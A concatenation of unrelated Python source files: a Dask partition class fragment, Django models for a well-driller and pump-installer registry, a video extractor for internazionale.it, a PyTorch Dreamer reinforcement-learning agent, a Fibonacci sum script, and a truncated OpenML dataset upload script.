Note: It is up to the implementation how kwargs are handled. They are
an important part of many implementations. As of right now, they
are not serialized.
Args:
func: The lambda to apply (may already be correctly formatted)
Returns:
A new `BaseFramePartition` containing the object that has had `func`
applied to it.
"""
import dask
# applies the func lazily
delayed_call = self.delayed_call
self.delayed_call = self.dask_obj
return self.__class__(dask.delayed(func)(delayed_call, **kwargs))
def add_to_apply_calls(self, func, **kwargs):
"""Add the function to the apply function call stack.
This function will be executed when apply is called. It will be executed
in the order inserted; apply's func operates the last and return
"""
import dask
self.delayed_call = dask.delayed(func)(self.delayed_call, **kwargs)
return self
def to_pandas(self):
"""Convert the object stored in this partition to a Pandas DataFrame.
Assumes the underlying object is a Pandas DataFrame and simply calls `get`
Returns:
A Pandas DataFrame.
"""
return self.get()
@classmethod
def put(cls, obj):
"""A factory classmethod to format a given object.
Args:
obj: An object.
Returns:
A `RemotePartitions` object.
"""
import dask
# simply wrap the input object by dask.delayed
return cls(dask.delayed(obj))
@classmethod
def preprocess_func(cls, func):
"""Preprocess a function before an `apply` call.
Note: This is a classmethod because the definition of how to preprocess
should be class-wide. Also, we may want to use this before we
deploy a preprocessed function to multiple `BaseFramePartition`
objects.
Args:
func: The function to preprocess.
Returns:
An object that can be accepted by `apply`.
"""
# seems that dask does not need any pre-processing
return func
@classmethod
def length_extraction_fn(cls):
return length_fn_pandas
@classmethod
def width_extraction_fn(cls):
return width_fn_pandas
@classmethod
def empty(cls):
return cls.put(pandas.DataFrame())
|
"""
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import uuid
import datetime
import logging
from django.db import models
from django.contrib.auth import get_user_model
from gwells.models import AuditModel, ProvinceStateCode
User = get_user_model()
logger = logging.getLogger(__name__)
class ActivityCode(AuditModel):
"""
Restricted Activity related to drilling wells and installing well pumps.
"""
registries_activity_code = models.CharField(
primary_key=True, max_length=10, editable=False)
description = models.CharField(max_length=100)
display_order = models.PositiveIntegerField()
effective_date = models.DateField(default=datetime.date.today)
expired_date = models.DateField(blank=True, null=True)
class Meta:
db_table = 'registries_activity_code'
ordering = ['display_order', 'description']
verbose_name_plural = 'Activity codes'
def __str__(self):
return self.description
class SubactivityCode(AuditModel):
"""
Restricted Activity Subtype related to drilling wells and installing well pumps.
"""
registries_subactivity_code = models.CharField(
primary_key=True,
max_length=10,
editable=False)
registries_activity = models.ForeignKey(
ActivityCode,
db_column='registries_activity_code',
on_delete=models.PROTECT)
description = models.CharField(max_length=100)
display_order = models.PositiveIntegerField()
effective_date = models.DateField(default=datetime.date.today)
expired_date = models.DateField(blank=True, null=True)
class Meta:
db_table = 'registries_subactivity_code'
ordering = ['display_order', 'description']
verbose_name_plural = 'Subactivity codes'
def __str__(self):
return self.description
class CertifyingAuthorityCode(AuditModel):
cert_auth_code = models.CharField(
primary_key=True,
max_length=50,
editable=False,
verbose_name="Certifying Authority Name")
description = models.CharField(max_length=100, blank=True, null=True)
effective_date = models.DateField(default=datetime.date.today)
expired_date = models.DateField(blank=True, null=True)
class Meta:
db_table = 'registries_certifying_authority_code'
ordering = ['cert_auth_code']
verbose_name_plural = 'Certifying Authorities'
def __str__(self):
return self.cert_auth_code
class AccreditedCertificateCode(AuditModel):
acc_cert_guid = models.UUIDField(
primary_key=True,
default=uuid.uuid4,
editable=False,
verbose_name="Accredited Certificate UUID")
cert_auth = models.ForeignKey(
CertifyingAuthorityCode,
db_column='cert_auth_code',
on_delete=models.PROTECT)
registries_activity = models.ForeignKey(
ActivityCode,
db_column='registries_activity_code',
on_delete=models.PROTECT)
name = models.CharField(max_length=100, editable=False,
verbose_name="Certificate Name")
description = models.CharField(max_length=100, blank=True, null=True)
effective_date = models.DateField(default=datetime.date.today)
expired_date = models.DateField(blank=True, null=True)
class Meta:
db_table = 'registries_accredited_certificate_code'
ordering = ['registries_activity', 'cert_auth']
verbose_name_plural = 'Accredited Certificates'
def __str__(self):
return '%s %s %s' % (self.cert_auth, self.registries_activity, self.name)
class Organization(AuditModel):
org_guid = models.UUIDField(
primary_key=True,
default=uuid.uuid4,
editable=False,
verbose_name="Organization UUID")
name = models.CharField(max_length=200)
street_address = models.CharField(
max_length=100, null=True, verbose_name='Street Address')
city = models.CharField(max_length=50, null=True, verbose_name='Town/City')
province_state = models.ForeignKey(
ProvinceStateCode,
db_column='province_state_code',
on_delete=models.PROTECT,
verbose_name='Province/State',
related_name="companies")
postal_code = models.CharField(
max_length=10, null=True, verbose_name='Postal Code')
main_tel = models.CharField(
null=True, max_length=15, verbose_name="Telephone number")
fax_tel = models.CharField(
null=True, max_length=15, verbose_name="Fax number")
website_url = models.URLField(null=True, verbose_name="Website")
effective_date = models.DateField(default=datetime.date.today)
expired_date = models.DateField(blank=True, null=True)
email = models.EmailField(
blank=True, null=True, verbose_name="Email adddress")
class Meta:
db_table = 'registries_organization'
ordering = ['name']
verbose_name_plural = 'Organizations'
def __str__(self):
return self.name
@property
def org_verbose_name(self):
prov = self.province_state.province_state_code
# display either "City, Province" or just "Province"
location = '{}, {}'.format(
self.city, prov) if self.city is not None else prov
return '{} ({})'.format(self.name, location)
class Person(AuditModel):
person_guid = models.UUIDField(
primary_key=True,
default=uuid.uuid4,
editable=False,
verbose_name="Person UUID")
first_name = models.CharField(max_length=100)
surname = models.CharField(max_length=100)
# As per D.A. - temporary fields to hold compliance-related details
well_driller_orcs_no = models.CharField(
max_length=25,
blank=True,
null=True,
verbose_name='ORCS File # reference (in context of Well Driller).')
pump_installer_orcs_no = models.CharField(
max_length=25,
blank=True,
null=True,
verbose_name='ORCS File # reference (in context of Pump Installer).')
# contact information
contact_tel = models.CharField(
blank=True,
null=True,
max_length=15,
verbose_name="Contact telephone number")
contact_cell = models.CharField(
blank=True,
null=True,
max_length=15,
verbose_name="Contact cell number")
contact_email = models.EmailField(
blank=True, null=True, verbose_name="Email address")
effective_date = models.DateField(default=datetime.date.today)
expired_date = models.DateField(blank=True, null=True)
class Meta:
db_table = 'registries_person'
ordering = ['first_name', 'surname']
verbose_name_plural = 'People'
def __str__(self):
return '%s %s' % (self.first_name, self.surname)
@property
def name(self):
return '%s %s' % (self.first_name, self.surname)
class ContactInfo(AuditModel):
contact_detail_guid = models.UUIDField(
primary_key=True,
default=uuid.uuid4,
editable=False,
verbose_name="Contact At UUID")
person = models.ForeignKey(
Person,
db_column='person_guid',
on_delete=models.PROTECT,
verbose_name="Person Reference",
related_name="contact_info")
contact_tel = models.CharField(
blank=True,
null=True,
max_length=15,
verbose_name="Contact telephone number")
contact_cell = models.CharField(
blank=True,
null=True,
max_length=15,
verbose_name="Contact cell number")
contact_email = models.EmailField(
blank=True, null=True, verbose_name="Email adddress")
effective_date = models.DateField(default=datetime.date.today)
expired_date = models.DateField(blank=True, null=True)
class Meta:
db_table = 'registries_contact_detail'
verbose_name_plural = 'Contact Information'
def __str__(self):
return '%s - %s, %s' % (
self.person,
self.contact_tel,
self.contact_email)
class WellClassCode(AuditModel):
"""
Class of Wells, classifying the type of wells and activities/subactivies permitted
"""
registries_well_class_code = models.CharField(
primary_key=True, max_length=10, editable=False)
description = models.CharField(max_length=100)
display_order = models.PositiveIntegerField()
effective_date = models.DateField(default=datetime.date.today)
expired_date = models.DateField(blank=True, null=True)
class Meta:
db_table = 'registries_well_class_code'
ordering = ['display_order', 'description']
verbose_name_plural = 'Well Classes'
def __str__(self):
return self.registries_well_class_code
class Qualification(AuditModel):
"""
Qualification of Well Class for a given Activity/SubActivity.
"""
registries_well_qualification_guid = models.UUIDField(
primary_key=True,
default=uuid.uuid4,
editable=False,
verbose_name="Qualification / Well Class UUID")
well_class = models.ForeignKey(
WellClassCode,
db_column='registries_well_class_code',
on_delete=models.PROTECT)
subactivity = models.ForeignKey(
SubactivityCode,
db_column='registries_subactivity_code',
on_delete=models.PROTECT,
related_name="qualification_set")
display_order = models.PositiveIntegerField()
effective_date = models.DateField(default=datetime.date.today)
expired_date = models.DateField(blank=True, null=True)
class Meta:
db_table = 'registries_well_qualification'
ordering = ['subactivity', 'display_order']
verbose_name_plural = 'Qualification codes'
def __str__(self):
return self.well_class.registries_well_class_code
class RegistriesStatusCode(AuditModel):
"""
Status of the Register Entry
"""
registries_status_code = models.CharField(
primary_key=True, max_length=10, editable=False)
description = models.CharField(max_length=100)
display_order = models.PositiveIntegerField()
effective_date = models.DateField(default=datetime.date.today)
expired_date = models.DateField(blank=True, null=True)
class Meta:
db_table = 'registries_status_code'
ordering = ['display_order', 'description']
verbose_name_plural = 'Registry Status Codes'
def __str__(self):
return self.description
class RegistriesRemovalReason(AuditModel):
"""
Possible Reasons for Removal from either of the Registers
"""
registries_removal_reason_code = models.CharField(
primary_key=True, max_length=10, editable=False)
description = models.CharField(max_length=100)
display_order = models.PositiveIntegerField()
effective_date = models.DateField(default=datetime.date.today)
expired_date = models.DateField(blank=True, null=True)
class Meta:
db_table = 'registries_removal_reason_code'
ordering = ['display_order', 'description']
verbose_name_plural = 'Registry Removal Reasons'
def __str__(self):
return self.description
class Register(AuditModel):
PENDING = 'P'
register_guid = models.UUIDField(
primary_key=True,
default=uuid.uuid4,
editable=False,
verbose_name="Register UUID")
registries_activity = models.ForeignKey(
ActivityCode,
db_column='registries_activity_code',
on_delete=models.PROTECT)
person = models.ForeignKey(Person, db_column='person_guid',
on_delete=models.PROTECT, related_name="registrations")
organization = models.ForeignKey(
Organization, blank=True,
db_column='organization_guid',
null=True, on_delete=models.PROTECT,
related_name="registrations")
status = models.ForeignKey(
RegistriesStatusCode,
db_column='registries_status_code',
on_delete=models.PROTECT,
default=PENDING,
verbose_name="Register Entry Status")
registration_no = models.CharField(max_length=15, blank=True, null=True)
registration_date = models.DateField(blank=True, null=True)
register_removal_reason = models.ForeignKey(
RegistriesRemovalReason,
db_column='registries_removal_reason_code',
on_delete=models.PROTECT,
blank=True,
null=True,
verbose_name="Removal Reason")
register_removal_date = models.DateField(
blank=True,
null=True,
verbose_name="Date of Removal from Register")
class Meta:
db_table = 'registries_register'
verbose_name_plural = 'Registrations'
def __str__(self):
return '%s - %s' % (
self.person,
self.registries_activity
)
class ApplicationStatusCode(AuditModel):
"""
Status of Applications for the Well Driller and Pump Installer Registries
"""
registries_application_status_code = models.CharField(
primary_key=True, max_length=10, editable=False)
description = models.CharField(max_length=100)
display_order = models.PositiveIntegerField()
effective_date = models.DateField(default=datetime.date.today)
expired_date = models.DateField(blank=True, null=True)
class Meta:
db_table = 'registries_application_status_code'
ordering = ['display_order', 'description']
verbose_name_plural = 'Application Status Codes'
def __str__(self):
return self.description
class ProofOfAgeCode(AuditModel):
"""
List of documents that can be used to indentify (the age) of an application
"""
registries_proof_of_age_code = models.CharField(
primary_key=True, max_length=10, editable=False)
description = models.CharField(max_length=100)
display_order = models.PositiveIntegerField()
effective_date = models.DateField(default=datetime.date.today)
expired_date = models.DateField(blank=True, null=True)
class Meta:
db_table = 'registries_proof_of_age_code'
ordering = ['display_order', 'description']
verbose_name_plural = 'ProofOfAgeCodes'
def __str__(self):
return self.registries_proof_of_age_code
class RegistriesApplication(AuditModel):
"""
Application from a well driller or pump installer to be on the GWELLS Register.
"""
application_guid = models.UUIDField(
primary_key=True,
default=uuid.uuid4,
editable=False,
verbose_name="Register Application UUID")
registration = models.ForeignKey(
Register,
db_column='register_guid',
on_delete=models.PROTECT,
verbose_name="Person Reference",
related_name='applications')
subactivity = models.ForeignKey(
SubactivityCode,
db_column='registries_subactivity_code',
on_delete=models.PROTECT,
related_name="applications")
file_no = models.CharField(
max_length=25, blank=True, null=True, verbose_name='ORCS File # reference.')
proof_of_age = models.ForeignKey(
ProofOfAgeCode,
db_column='registries_proof_of_age_code',
on_delete=models.PROTECT,
verbose_name="Proof of age.",
null=True
)
registrar_notes = models.CharField(
max_length=255,
blank=True,
null=True,
verbose_name='Registrar notes, for internal use only.')
reason_denied = models.CharField(
max_length=255,
blank=True,
null=True,
verbose_name='Free form text explaining reason for denial.')
# TODO Support multiple certificates
primary_certificate = models.ForeignKey(
AccreditedCertificateCode,
blank=True,
null=True,
db_column='acc_cert_guid',
on_delete=models.PROTECT,
verbose_name="Certificate")
primary_certificate_no = models.CharField(max_length=50)
@property
def current_status(self):
try:
return RegistriesApplicationStatus.objects.get(
application=self.application_guid,
expired_date=None)
except:
logger.error('Could not find the current status for application: {}'.format(
self.application_guid))
return None
class Meta:
db_table = 'registries_application'
verbose_name_plural = 'Applications'
def __str__(self):
return '%s : %s' % (
self.registration,
self.file_no)
class RegistriesApplicationStatus(AuditModel):
"""
Status of a specific Application for the Well Driller and Pump Installer Registries, at a point in time
"""
application_status_guid = models.UUIDField(
primary_key=True,
default=uuid.uuid4,
editable=False,
verbose_name="Register Application Status UUID")
application = models.ForeignKey(
RegistriesApplication,
db_column='application_guid',
on_delete=models.CASCADE,
verbose_name="Application Reference",
related_name="status_set")
status = models.ForeignKey(
ApplicationStatusCode,
db_column='registries_application_status_code',
on_delete=models.PROTECT,
verbose_name="Application Status Code Reference")
notified_date = models.DateField(
blank=True, null=True, default=datetime.date.today)
effective_date = models.DateField(default=datetime.date.today)
expired_date = models.DateField(blank=True, null=True)
class Meta:
db_table = 'registries_application_status'
ordering = ['application', 'effective_date']
verbose_name_plural = 'Application status'
def __str__(self):
return '%s - %s - %s (exp %s)' % (
self.application,
self.status.description,
self.effective_date,
self.expired_date)
class Register_Note(AuditModel):
register_note_guid = models.UUIDField(
primary_key=True,
default=uuid.uuid4,
editable=False,
verbose_name="Register Node UUID")
registration = models.ForeignKey(
Register,
db_column='register_guid',
on_delete=models.PROTECT,
verbose_name="Register Reference",
related_name='notes')
notes = models.TextField(
max_length=2000,
blank=True,
null=True,
verbose_name='Registrar notes, for internal use only.')
class Meta:
db_table = 'registries_register_note'
verbose_name_plural = 'Registrar Notes'
def __str__(self):
return '%s' % (
self.notes
)
class OrganizationNote(AuditModel):
org_note_guid = models.UUIDField(
primary_key=True,
default=uuid.uuid4,
editable=False,
verbose_name="Company note UUID")
author = models.ForeignKey(
User,
db_column='user_guid',
on_delete=models.PROTECT,
verbose_name='Author reference')
organization = models.ForeignKey(
Organization,
db_column='org_guid',
on_delete=models.PROTECT,
verbose_name="Company reference",
related_name="notes")
date = models.DateTimeField(auto_now_add=True)
note = models.TextField(max_length=2000)
class Meta:
db_table = 'registries_organization_note'
def __str__(self):
return self.note[:20] + ('...' if len(self.note) > 20 else '')
class PersonNote(AuditModel):
person_note_guid = models.UUIDField(
primary_key=True,
default=uuid.uuid4,
editable=False,
verbose_name="Person note UUID")
author = models.ForeignKey(
User,
db_column='user_guid',
on_delete=models.PROTECT,
verbose_name='Author reference')
person = models.ForeignKey(
Person,
db_column='person_guid',
on_delete=models.PROTECT,
verbose_name="Person reference",
related_name="notes")
date = models.DateTimeField(auto_now_add=True)
note = models.TextField(max_length=2000)
class Meta:
db_table = 'registries_person_note'
def __str__(self):
return self.note[:20] + ('...' if len(self.note) > 20 else '')
"""
Tue Apr 10 10:15:34 2018 Expose DB Views to Django
"""
class vw_well_class(models.Model):
subactivity = models.CharField(
primary_key=True,
max_length=10,
editable=False)
activity_code = models.ForeignKey(
ActivityCode,
db_column='registries_activity_code',
on_delete=models.PROTECT)
class_desc = models.CharField(max_length=100)
class_name = models.CharField(max_length=100)
class Meta:
db_table = 'vw_well_class'
verbose_name = "Registries Well Class"
verbose_name_plural = "Registries Well Classes"
managed = False
def __str__(self):
return '%s %s %s' % (self.subactivity, self.activity_code, self.well_class)
|
# coding: utf-8
from __future__ import unicode_literals
from .common import InfoExtractor
from ..utils import unified_timestamp
class InternazionaleIE(InfoExtractor):
_VALID_URL = (
r"https?://(?:www\.)?internazionale\.it/video/(?:[^/]+/)*(?P<id>[^/?#&]+)"
)
_TESTS = [
{
"url": "https://www.internazionale.it/video/2015/02/19/richard-linklater-racconta-una-scena-di-boyhood",
"md5": "3e39d32b66882c1218e305acbf8348ca",
"info_dict": {
"id": "265968",
"display_id": "richard-linklater-racconta-una-scena-di-boyhood",
"ext": "mp4",
"title": "Richard Linklater racconta una scena di Boyhood",
"description": "md5:efb7e5bbfb1a54ae2ed5a4a015f0e665",
"timestamp": 1424354635,
"upload_date": "20150219",
"thumbnail": r"re:^https?://.*\.jpg$",
},
"params": {
"format": "bestvideo",
},
},
{
"url": "https://www.internazionale.it/video/2018/08/29/telefono-stare-con-noi-stessi",
"md5": "9db8663704cab73eb972d1cee0082c79",
"info_dict": {
"id": "761344",
"display_id": "telefono-stare-con-noi-stessi",
"ext": "mp4",
"title": "Usiamo il telefono per evitare di stare con noi stessi",
"description": "md5:75ccfb0d6bcefc6e7428c68b4aa1fe44",
"timestamp": 1535528954,
"upload_date": "20180829",
"thumbnail": r"re:^https?://.*\.jpg$",
},
"params": {
"format": "bestvideo",
},
},
]
def _real_extract(self, url):
display_id = self._match_id(url)
webpage = self._download_webpage(url, display_id)
DATA_RE = r'data-%s=(["\'])(?P<value>(?:(?!\1).)+)\1'
title = self._search_regex(
DATA_RE % "video-title", webpage, "title", default=None, group="value"
) or self._og_search_title(webpage)
video_id = self._search_regex(
DATA_RE % "job-id", webpage, "video id", group="value"
)
video_path = self._search_regex(
DATA_RE % "video-path", webpage, "video path", group="value"
)
video_available_abroad = self._search_regex(
DATA_RE % "video-available_abroad",
webpage,
"video available aboard",
default="1",
group="value",
)
video_available_abroad = video_available_abroad == "1"
video_base = "https://video%s.internazionale.it/%s/%s." % (
"" if video_available_abroad else "-ita",
video_path,
video_id,
)
formats = self._extract_m3u8_formats(
video_base + "m3u8",
display_id,
"mp4",
entry_protocol="m3u8_native",
m3u8_id="hls",
fatal=False,
)
formats.extend(
self._extract_mpd_formats(
video_base + "mpd", display_id, mpd_id="dash", fatal=False
)
)
self._sort_formats(formats)
timestamp = unified_timestamp(
self._html_search_meta("article:published_time", webpage, "timestamp")
)
return {
"id": video_id,
"display_id": display_id,
"title": title,
"thumbnail": self._og_search_thumbnail(webpage),
"description": self._og_search_description(webpage),
"timestamp": timestamp,
"formats": formats,
}
|
from itertools import chain
from math import ceil
from pathlib import Path
from typing import Tuple
import numpy as np
import torch
import torch.distributions as td
from visdom import Visdom
from .optimizer import Optimizer
from .rssm import Rssm, State, kl_divergence_between_states
from .utils import Dataset, FreezeParameters, apply
class Dreamer:
train_steps = 100
batch_size = 50
episode_length = 50
horizon = 15
deterministic_size = 200
stochastic_size = 30
state_dist_type = td.Normal
free_nats = 3.0
kl_scale = 1.0
discount = 0.99
discount_lambda = 0.95
visdom = Visdom()
def __init__(
self,
device: torch.device,
encoder,
prior,
posterior,
decoder,
reward,
policy,
value,
):
self.device = device
self.encoder = encoder().to(device)
self.rssm = Rssm(
prior=prior(
deterministic_size=self.deterministic_size,
stochastic_size=self.stochastic_size,
).to(device),
posterior=posterior(
obs_embed_size=self.encoder.embed_size,
deterministic_size=self.deterministic_size,
stochastic_size=self.stochastic_size,
).to(device),
distribution=self.state_dist_type,
)
feature_size = self.deterministic_size + self.stochastic_size
self.decoder = decoder(embed_size=feature_size).to(device)
self.reward = reward(feature_size, 1).to(device)
self.policy = policy(feature_size).to(device)
self.value = value(feature_size, 1).to(device)
self.optimizer = Optimizer(
world=[
self.encoder,
self.rssm.prior,
self.rssm.posterior,
self.decoder,
self.reward,
],
policy=self.policy,
value=self.value,
)
def __call__(
self, observation: np.ndarray, train: bool = True, random: bool = False
) -> np.ndarray:
if random:
# https://github.com/openai/gym/blob/8cf2685db25572e4fd6716565694d05f83000d60/gym/spaces/box.py#L117
low, high = self.policy.explore.action_range
action = np.random.uniform(
low, high, (observation.shape[0], self.policy.action_size)
)
return action
o = torch.tensor(observation).float().to(self.device)
if not hasattr(self, "state"):
self.state = State.zero(
o.size(0),
self.deterministic_size,
self.stochastic_size,
self.device,
)
if not hasattr(self, "action"):
self.action = torch.zeros(
o.size(0),
self.policy.action_size,
device=o.device,
dtype=o.dtype,
)
with torch.no_grad():
embed_o = self.encoder(o)
prior = self.rssm.predict(self.state, self.action)
self.state = self.rssm.update(prior, embed_o)
a = self.policy(self.state.feature())
if train:
self.action = self.policy.dist(a).sample()
self.action = self.policy.explore(self.action)
else:
self.action = self.policy.dist(a).mode()
return self.action.cpu().numpy()
def reset(self):
if hasattr(self, "state"):
delattr(self, "state")
if hasattr(self, "action"):
delattr(self, "action")
def update(self, episode_dir: str):
dataset = Dataset(episode_dir)
loader = dataset.loader(batch_size=self.batch_size, shuffle=True)
repeats = ceil((self.batch_size * self.train_steps) / len(dataset))
if repeats > 0:
loaders = [loader] * repeats
loader = chain(*loaders)
for step, data in enumerate(loader):
# the data shape is (time, batch, c, h, w) or (time, batch, 1)
o = data["o"].float().to(self.device)
a = data["a"].float().to(self.device)
r = data["r"].float().to(self.device)
done = data["done"].float().to(self.device)
loss_w, posterior = self.world_loss(step, o, a, r, done)
loss_p, loss_v = self.agent_loss(step, posterior)
loss = (loss_w.item(), loss_p.item(), loss_v.item())
print("\r", f"Step: {step}\tLoss(w, p, v): {loss}", end="")
self.optimizer.zero_grad()
loss_w.backward()
loss_p.backward()
loss_v.backward()
self.optimizer.clip_grad_norm()
self.optimizer.step()
if step >= self.train_steps:
break
print()
def world_loss(
self,
step: int,
o: torch.Tensor,
a: torch.Tensor,
r: torch.Tensor,
done: torch.Tensor,
) -> Tuple[torch.Tensor, State]:
embed_o = self.rollout(self.encoder, o)
posterior = State.zero(
embed_o.size(1),
self.deterministic_size,
self.stochastic_size,
self.device,
)
priors, posteriors = [], []
for o_i, a_i in zip(embed_o, a):
prior = self.rssm.predict(posterior, a_i)
posterior = self.rssm.update(prior, o_i)
priors.append(prior)
posteriors.append(posterior)
features = [p.feature() for p in posteriors]
prior = State.stack(priors, dim=0)
posterior = State.stack(posteriors, dim=0)
div = kl_divergence_between_states(
prior, posterior, self.free_nats, self.state_dist_type
)
recon = self.rollout(self.decoder, features)
recon_loss = -1.0 * torch.mean(self.decoder.dist(recon).log_prob(o))
reward = self.rollout(self.reward, features)
reward_loss = -1.0 * torch.mean(self.reward.dist(reward).log_prob(r))
loss = self.kl_scale * div + recon_loss + reward_loss
with torch.no_grad():
if step >= self.train_steps:
self.log_imagination(step, o, a, recon, posteriors)
return loss, posterior
def rollout(self, network, data):
x = [network(datum) for datum in data]
return torch.stack(x, dim=0)
def agent_loss(
self, step: int, posterior: State
) -> Tuple[torch.Tensor, torch.Tensor]:
def detach_and_reshape(data):
# exclude the last frame which may contain the done-event
x = data[:-1].detach().clone()
# merge the time and batch dimensions
size = x.size()
x = torch.reshape(x, (size[0] * size[1], -1))
return x
s = apply(posterior, detach_and_reshape)
with FreezeParameters(self.rssm.prior):
states = []
for _ in range(self.horizon):
a = self.policy(s.detach().feature())
a = self.policy.dist(a).rsample()
s = self.rssm.predict(s, a)
states.append(s)
features = [s.feature() for s in states]
feature = torch.stack(features, dim=0)
with FreezeParameters([self.reward, self.value]):
# the normal mean is equal to the mode
reward = self.reward(feature)
value = self.value(feature)
discount = self.discount * torch.ones_like(reward)
returns = self.compute_return(
reward[:-1],
value[:-1],
discount[:-1],
bootstrap=value[-1],
lambda_=self.discount_lambda,
)
# Make the top row 1 so the cumulative product starts with discount^0
discount = torch.cat([torch.ones_like(discount[:1]), discount[1:]])
discount = torch.cumprod(discount[:-1], 0).detach()
policy_loss = -torch.mean(discount * returns)
value_feat = feature[:-1].detach()
v = returns.detach()
value = self.value(value_feat)
value = self.value.dist(value)
log_prob = value.log_prob(v)
value_loss = -torch.mean(discount * log_prob.unsqueeze(2))
return policy_loss, value_loss
def compute_return(
self,
reward: torch.Tensor,
value: torch.Tensor,
discount: torch.Tensor,
bootstrap: torch.Tensor,
lambda_: float,
):
"""
Compute the discounted reward for a batch of data.
reward, value, and discount are all shape [horizon - 1, batch, 1]
(last element is cut off)
Bootstrap is [batch, 1]
"""
next_values = torch.cat([value[1:], bootstrap[None]], 0)
target = reward + discount * next_values * (1 - lambda_)
timesteps = list(range(reward.shape[0] - 1, -1, -1))
outputs = []
accumulated_reward = bootstrap
for t in timesteps:
inp = target[t]
discount_factor = discount[t]
accumulated_reward = (
inp + discount_factor * lambda_ * accumulated_reward
)
outputs.append(accumulated_reward)
returns = torch.flip(torch.stack(outputs), [0])
return returns
def log_imagination(
self,
step,
observation,
action,
recon,
posteriors,
imagination_step: int = 7,
num_show_episodes: int = 4,
):
s = posteriors[imagination_step - 1]
def select_episodes(x):
return x[:num_show_episodes]
s = apply(s, select_episodes)
features = []
for a in action[imagination_step:, :num_show_episodes]:
s = self.rssm.predict(s, a)
features.append(s.feature())
imagination = self.rollout(self.decoder, features)
inference = torch.cat(
(recon[:imagination_step, :num_show_episodes], imagination),
dim=0,
)
def make_timeline(data):
view_idx = list(range(self.horizon)) + list(
range(self.horizon, self.episode_length, 5)
)
data = [data[i] for i in view_idx]
data = torch.cat(data, axis=3)
return data
inference = make_timeline(inference.cpu())
observation = make_timeline(observation[:, :num_show_episodes].cpu())
comps = []
for o, i in zip(observation, inference):
comp = torch.cat((o, i), dim=1)
comps.append(comp)
comp = torch.cat(comps, dim=1)
comp = comp[:1]
comp = (comp - torch.min(comp)) * (
1 / (torch.max(comp) - torch.min(comp)) * 1.0
)
self.visdom.image(
comp,
win="RSSM",
opts=dict(
title="RSSM",
caption=f"imagination starts from {imagination_step}",
store_history=True,
),
)
def save_weight(self, directory: str):
Path(directory).mkdir(parents=True, exist_ok=True)
def save(network, filename):
torch.save(network.state_dict(), filename)
save(self.encoder, f"{directory}/encoder.pkl")
save(self.rssm.prior, f"{directory}/prior.pkl")
save(self.rssm.posterior, f"{directory}/posterior.pkl")
save(self.decoder, f"{directory}/decoder.pkl")
save(self.reward, f"{directory}/reward.pkl")
save(self.policy, f"{directory}/policy.pkl")
save(self.value, f"{directory}/value.pkl")
save(self.optimizer, f"{directory}/optimizer.pkl")
def load_weight(self, directory: str):
def load(network, filename):
network.load_state_dict(torch.load(filename))
load(self.encoder, f"{directory}/encoder.pkl")
load(self.rssm.prior, f"{directory}/prior.pkl")
load(self.rssm.posterior, f"{directory}/posterior.pkl")
load(self.decoder, f"{directory}/decoder.pkl")
load(self.reward, f"{directory}/reward.pkl")
load(self.policy, f"{directory}/policy.pkl")
load(self.value, f"{directory}/value.pkl")
load(self.optimizer, f"{directory}/optimizer.pkl")
|
fiboValuePre = 0
fiboValueNext = 1
sumValue = 0
fiboValueNextNext = 0
while fiboValueNextNext <= 4000000 :
fiboValueNextNext = fiboValuePre+fiboValueNext
if fiboValueNextNext%2==0 :
sumValue += fiboValueNextNext
fiboValuePre = fiboValueNext
fiboValueNext = fiboValueNextNext
print(str(sumValue))
|
'''
This script uploads our datasets into openml with its API. It then produces a python snippet
to be pasted in the web page to import the dataset via sklearn through openml
Notes:
1. We remove non-ascii characters within the categorical (nominal) values (it does not work if we don't do this)
2. We remove the lines with missing values in the target variable
Usage:
my_script.py <datasets_folder> <output_snippet_folder> <main_csv_file> [options]
Arguments:
<datasets_folder> A folder with dgf resources ids and csv files within
<output_snippet_folder> A folder with dgf resources ids and csv files within
<main_csv_file> The path of the main csv file used in the website
'''
from dotenv import load_dotenv
load_dotenv(verbose=True)
import logging
import os
openml_apikey = os.getenv("openml_apikey")
from pathlib import Path
import pandas as pd
from csv_detective.explore_csv import routine
from argopt import argopt
from tqdm import tqdm
import openml
from openml.datasets.functions import create_dataset
from app.apps.utils import slugify
openml.config.start_using_configuration_for_example()
openml.config.apikey = openml_apikey
def split_cell_value(value):
if len(value) > 256:
print(f"Value {value} was limited to 256 chars bc it was too long")
return value[:256]
else:
return value
def main(datasets_folder: Path, output_folder: Path, main_csv_file: Path):
doc_paths = []
job_output = []
if not datasets_folder.exists():
raise FileNotFoundError(datasets_folder.as_posix())
if not output_folder.exists():
raise FileNotFoundError(output_folder.as_posix())
if not main_csv_file.exists():
raise FileNotFoundError(main_csv_file.as_posix())
main_csv = pd.read_csv(main_csv_file)
list_subfolders_with_paths = [Path(f.path) for f in os.scandir(datasets_folder.as_posix()) if f.is_dir()]
for path in list_subfolders_with_paths:
id_dataset = path.name
dataset_file = [Path(f) for f in path.glob(f"{id_dataset}.*")]
if not dataset_file:
logging.debug(f"There was not dataset for {id_dataset}")
dataset_metadata = routine(dataset_file[0], user_input_tests=None)
df_dataset = pd.read_csv(dataset_file[0], sep=dataset_metadata["separator"],
encoding=dataset_metadata["encoding"])
dataset_info = main_csv[main_csv['dgf_resource_id'] == id_dataset]
description = dataset_info['title'][dataset_info.index.to_list()[0]]
description = description.encode('utf-8').decode('ascii', 'ignore')
target_var = slugify(dataset_info['target_variable'][dataset_info.index.to_list()[0]])
df_dataset.rename(columns=slugify, inplace=True)
df_dataset = df_dataset[df_dataset[target_var].notna()]
# enforce the categorical column to have a categorical dtype
for cat_var in df_dataset.select_dtypes(include='object').columns.to_list():
df_dataset[cat_var] = df_dataset[cat_var].astype('category')
df_dataset[cat_var] = df_dataset[cat_var].apply(
lambda x: split_cell_value(x).encode('utf-8').decode('ascii', 'ignore'))
name = f"dgf_{id_dataset}"
try:
new_dataset = create_dataset(
name=name,
description=description,
creator="dgml_test",
contributor="dgml_test",
collection_date="20-05-2021",
language="French",
licence="Undefined",
default_target_attribute=target_var,
row_id_attribute=None,
ignore_attribute=None,
citation="dgf test",
attributes='auto',
data=df_dataset,
version_label="example",
original_data_url="url_dgml"
)
new_dataset.data_file = dataset_file[0]
data_id = new_dataset.publish()
print(f"The dataid of the resource is: {data_id}")
except Exception as e:
print(e)
return doc_paths
if __name__ == '__main__':
